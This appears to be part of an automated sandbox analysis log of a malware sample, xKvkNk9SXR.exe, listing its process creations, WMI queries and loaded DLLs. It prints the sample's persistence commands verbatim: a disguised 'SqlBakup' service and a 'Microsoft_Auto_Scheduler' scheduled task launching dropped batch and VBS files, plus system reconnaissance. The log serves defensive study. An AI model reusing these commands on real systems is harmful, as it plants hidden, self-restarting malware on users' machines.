      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1936"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1944"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1952"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2024"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2096"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2152"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2188"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2204"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2240"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2392"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2400"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2440"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2484"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2492"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2528"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2588"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2596"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2628"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2768"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2868"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2932"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3260"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3512"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3696"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3756"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3984"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2456"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4132"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4800"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4572"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5152"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5932"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6708"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6792"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6836"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6960"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3584"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5500"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5280"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4296"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4820"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5840"::GetOwner
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XKVKNK9SXR.EXE'
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XKVKNK9SXR.EXE'
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XKVKNK9SXR.EXE'
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XKVKNK9SXR.EXE'
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XKVKNK9SXR.EXE'
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XKVKNK9SXR.EXE'
      Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: xKvkNk9SXR.exeReversingLabs: Detection: 81%
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile read: C:\Users\user\Desktop\xKvkNk9SXR.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\xKvkNk9SXR.exe "C:\Users\user\Desktop\xKvkNk9SXR.exe"
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "os name"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /v
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf"
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat""
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "original"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\SysWOW64\find.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I /c "dcdcf"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=autoJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c verJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.batJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /fJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c verJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csvJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=autoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.batJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "os name"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /vJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "original"Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I /c "dcdcf"
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: samlib.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: mswsock.dllJump to behavior
